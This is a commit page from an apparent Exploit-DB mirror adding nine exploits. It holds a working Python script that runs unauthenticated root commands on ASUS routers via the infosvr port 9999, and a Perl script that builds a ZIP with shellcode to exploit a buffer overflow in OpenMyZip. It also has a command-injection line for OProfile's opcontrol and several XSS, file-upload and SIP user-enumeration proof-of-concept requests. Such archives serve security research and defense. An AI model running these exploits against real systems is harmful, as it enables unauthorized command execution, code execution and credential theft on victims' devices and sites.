bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-01-05

Browse source 
9 new exploits
This commit is contained in:
Offensive Security 2015-01-05 08:36:21 +00:00
parent e60ec300be
commit e112b990da
10 changed files with 690 additions and 352 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

713
files.csv
View file

File diff suppressed because it is too large Load diff

85
platforms/hardware/remote/35688.py Executable file
View file

@ -0,0 +1,85 @@
#!/usr/bin/env python3
# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage: http://www.asus.com/
# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U
# Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
# "iboxcom.h" is in asuswrt/release/src/router/shared.
#
# Affected devices may also include wireless repeaters and other networking
# products, especially the ones which have "Device Discovery" in their features
# list.
#
# Using broadcast address as the IP address should work and execute the command
# on all devices in the network segment, but only receiving one response is
# supported by this script.
import sys, os, socket, struct
PORT = 9999
if len(sys.argv) < 3:
print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)
sys.exit(1)
ip = sys.argv[1]
cmd = sys.argv[2]
enccmd = cmd.encode()
if len(enccmd) > 237:
# Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.
print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)
sys.exit(1)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', PORT))
sock.settimeout(2)
# Request consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_CMD
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Comment: "Or Transaction ID"
# MacAddress [byte[6]] ; Double-wrongly "checked" with memcpy instead of memcmp
# Password [byte[32]] ; Not checked at all
# Length [word]
# Command [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable
packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')
sock.sendto(packet, (ip, PORT))
# Response consists of following things
# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO
# PacketType [byte] ; NET_PACKET_TYPE_RES
# OpCode [word] ; NET_CMD_ID_MANU_CMD
# Info [dword] ; Equal to Info of request
# MacAddress [byte[6]] ; Filled in for us
# Length [word]
# Result [byte[420]] ; Actually returns that amount
while True:
data, addr = sock.recvfrom(512)
if len(data) == 512 and data[1] == 22:
break
length = struct.unpack('<H', data[14:16])[0]
s = slice(16, 16+length)
sys.stdout.buffer.write(data[s])
sock.close()

7
platforms/java/webapps/35683.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47672/info
LANSA aXes Web Terminal TN5250 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
https://www.example.com/axests/terminal?cssref=/ts/skins/axes_default.css?axbuild=135001&login=[xss]

9
platforms/linux/local/35681.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47652/info
OProfile is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to run arbitrary commands with superuser privileges.
The following example command is available:
sudo opcontrol -e "abcd;/usr/bin/id"

22
platforms/multiple/remote/35685.txt Executable file
View file

@ -0,0 +1,22 @@
source: http://www.securityfocus.com/bid/47676/info
Asterisk is prone to a user-enumeration weakness.
An attacker may leverage this issue to harvest valid usernames, which may aid in brute-force attacks.
This issue affects Asterisks 1.8.
The following request is available:
INVITE sip:192.168.2.1 SIP/2.0
CSeq: 3 INVITE
Via: SIP/2.0/UDP www.example.com:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:105@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 5RRdd5Cv-0771-e011-84a1-a1816009ca7a@lapblack2
To: <sip:500@192.168.2.1>
Contact: <sip:105@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 0
Max-Forwards: 70

13
platforms/php/webapps/35680.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47636/info
ClanSphere is prone to a local file-include vulnerability and multiple arbitrary-file-upload vulnerabilities.
An attacker can exploit these issues to upload arbitrary files onto the webserver, execute arbitrary local files within the context of the webserver, and obtain sensitive information.
ClanSphere 2011.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/mods/ckeditor/filemanager/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=[LFI]%00
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/test.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/connectors/uploadtest.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/browser.html
http://www.example.com/[Path]/mods/ckeditor/filemanager/browser/default/frmupload.html

9
platforms/php/webapps/35682.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47669/info
Tine is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Tine 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/tine/library/vcardphp/vbook.php?file=<script>alert(0)</script>

9
platforms/php/webapps/35684.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47674/info
LDAP Account Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
LDAP Account Manager 3.4.0 is vulnerable; other versions may also be affected.
http://www.example.com/ldap-account-manager-3.4.0/templates/login.php?selfserviceSaveOk=[XSS]

28
platforms/php/webapps/35691.txt Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Crea8Social v.2.0 XSS Change Interface
# Google Dork: intext:Copyright © 2014 CreA8social.
# Date: January 3, 2015
# Exploit Author: r0seMary
# Vendor Homepage: http://crea8social.com
# Software Link: http://codecanyon.net/item/crea8social-php-social-networking-platform-v20/9211270 or http://crea8social.com
# Version: v.2.0 (Latest version)
# Tested on: Windows 7
# CVE : -
================================================================================
Bismillahirahmanirahim
Assalamualaikum Wr.Wb
--[Fatal Xss Vulnerability]--
1. Register on the site
2. Go to Menu, Click Game
3. Add Game
4. At Game Content, enter your xss code. for example:
<script>document.body.innerHTML="your text here"</script><noscript>
look at the result, the user interface change into your xss code ;)
Proof of Concept:
http://104.131.164.9/demo/games/124 (Crea8Social Official Site)
./r0seMary
Wassalamualaikum.wr.wb

147
platforms/windows/remote/35686.pl Executable file
View file

@ -0,0 +1,147 @@
source: http://www.securityfocus.com/bid/47678/info
OpenMyZip is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
OpenMyZip 0.1 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
#
#
#[+]Exploit Title: OpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability
#[+]Date: 02\05\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/OpenMyZip/3000-2250_4-10657274.html
#[+]Version: v0.1
#[+]Tested On: WIN-XP SP3 Brazil Portuguese
#[+]CVE: N/A
#
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tOpenMyZip V0.1 .ZIP File Buffer Overflow Vulnerability\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
print "\n\n[+] Creting ZIP File...\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02\x14\x00\x14".
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xe4\x0f".
"\x00\x00\x00\x00\x00\x00\x01\x00".
"\x24\x00\x00\x00\x00\x00\x00\x00";
my $head3 = "\x50\x4B\x05\x06\x00\x00\x00".
"\x00\x01\x00\x01\x00".
"\x12\x10\x00\x00".
"\x02\x10\x00\x00".
"\x00\x00";
my $payload = "\x41" x 8;
$payload = $payload.
("\x61" x 7).#6 POPAD
("\x6A\x30").#PUSH 30
("\x5B\x52\x59").#POP EBX / PUSH EDX / POP ECX
("\x41" x 10).#10 INC EAX
("\x02\xd3").#ADD CL,BL
("\x51\x58").#PUSH ECX / POP EAX
("\x98\xd1"); #BASE CONVERSION
#"\x98" == "\xff"
# "\xd1" == "\xd0"
#"\xff" + "\xd0" = CALL EAX AND CODE EXECUTION.;-}
$payload .= "\x41" x 22;#MORE PADDING FOR START FROM MY SHELLCODE
$payload .=
"PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIYK9PFQO9OO3LUFRPHLN9R".
"TFDZTNQ5NV8VQSHR8MSM8KLUSRXRHKDMUVPBXOLSUXI48X6FCJUZSODNNCMTBOZ7JP2ULOOU2JMUMPTN".
"5RFFIWQM7MFSPZURQYZ5V05ZU4TO7SLKK5KEUBKJPQ79MW8KM12FXUK92KX9SZWWK2ZHOPL0O13XSQCO".#Alpha SHELLCODE WinExec('calc',0) BaseAddress = EAX
"T67JW9HWKLCLNK3EOPWQCE4PQ9103HMZUHFJUYQ3NMHKENJL1S5NHWVJ97MGK9PXYKN0Q51864NVOMUR".
"9K7OGT86OPYJ03K9GEU3OKXSKYZA";
$payload .= "\x44" x (2050-length($payload));
$payload .= "\x58\x78\x39".#POP EAX / JS SHORT 011E0098
"\x41" x 5;# PADDING FOR OVERWRITE EIP
$payload .= pack('V',0x00404042);#JMP EBX
$payload .= "\x42" x 50;
$payload .= "\x41" x (4064-length($payload));
$payload = $payload.".txt";
my $zip = $head.$payload.$head2.$payload.$head3;
open(FILE,">$filename") || die "[-]Error:\n$!\n";
print FILE $zip;
close(FILE);
print "[+] ZIP File Created With Sucess:)\n";
sleep(2);
=head
#
#The Vulnerable Function:
#
#
#The Vulnerable function is in MODULE UnzDll.dll on
#Function UnzDllExec+0x7a3 after CALL the function kernel32.lstrcpyA
#ocorrs the Buffer Overflow on movimentation of the String Very large.
#
#Assemble:
#
# 0x00DA6A6F 53 PUSH EBX
# 0x00DA6A70 56 PUSH ESI
# 0x00DA6A71 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8]
# 0x00DA6A74 8B55 18 MOV EDX,DWORD PTR SS:[EBP+18]
# 0x00DA6A77 8B45 10 MOV EAX,DWORD PTR SS:[EBP+10]
# 0x00DA6A7A 83BE 8CD20000 00 CMP DWORD PTR DS:[ESI+D28C],0
# 0x00DA6A81 8D9E 50D80000 LEA EBX,DWORD PTR DS:[ESI+D850]
# 0x00DA6A87 74 65 JE SHORT UnzDll.00DA6AEE
# 0x00DA6A89 8B8E 84D20000 MOV ECX,DWORD PTR DS:[ESI+D284]
# 0x00DA6A8F 890B MOV DWORD PTR DS:[EBX],ECX
# 0x00DA6A91 8B8E 88D20000 MOV ECX,DWORD PTR DS:[ESI+D288]
# 0x00DA6A97 894B 04 MOV DWORD PTR DS:[EBX+4],ECX
# 0x00DA6A9A 33C9 XOR ECX,ECX
# 0x00DA6A9C C743 08 A0000000 MOV DWORD PTR DS:[EBX+8],0A0
# 0x00DA6AA3 894B 0C MOV DWORD PTR DS:[EBX+C],ECX
# 0x00DA6AA6 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]
# 0x00DA6AA9 894B 10 MOV DWORD PTR DS:[EBX+10],ECX
# 0x00DA6AAC 81BE 88DB0000 91>CMP DWORD PTR DS:[ESI+DB88],91
# 0x00DA6AB6 7F 0A JG SHORT UnzDll.00DA6AC2
# 0x00DA6AB8 8BC8 MOV ECX,EAX
# 0x00DA6ABA 80E1 FF AND CL,0FF
# 0x00DA6ABD 0FBEC9 MOVSX ECX,CL
# 0x00DA6AC0 EB 02 JMP SHORT UnzDll.00DA6AC4
# 0x00DA6AC2 8BC8 MOV ECX,EAX
# 0x00DA6AC4 894B 14 MOV DWORD PTR DS:[EBX+14],ECX
# 0x00DA6AC7 85D2 TEST EDX,EDX
# 0x00DA6AC9 8B45 14 MOV EAX,DWORD PTR SS:[EBP+14]
# 0x00DA6ACC 8943 18 MOV DWORD PTR DS:[EBX+18],EAX
# 0x00DA6ACF 75 06 JNZ SHORT UnzDll.00DA6AD7
# 0x00DA6AD1 C643 1C 00 MOV BYTE PTR DS:[EBX+1C],0
# 0x00DA6AD5 EB 0A JMP SHORT UnzDll.00DA6AE1
# 0x00DA6AD7 52 PUSH EDX
# 0x00DA6AD8 8D53 1C LEA EDX,DWORD PTR DS:[EBX+1C]
# 0x00DA6ADB 52 PUSH EDX
# 0x00DA6ADC E8 ABF20000 CALL UnzDll.00DB5D8C ; JMP to kernel32.lstrcpyA
# 0x00DA6AE1 53 PUSH EBX
# 0x00DA6AE2 FF96 8CD20000 CALL DWORD PTR DS:[ESI+D28C] ; Here ocorrs the Code Execution:-)
# 0x00DA6AE8 0986 70D20000 OR DWORD PTR DS:[ESI+D270],EAX
# 0x00DA6AEE 5E POP ESI
# 0x00DA6AEF 5B POP EBX
# 0x00DA6AF0 5D POP EBP
# 0x00DA6AF1 C3 RETN
#
#
#
#
#
=cut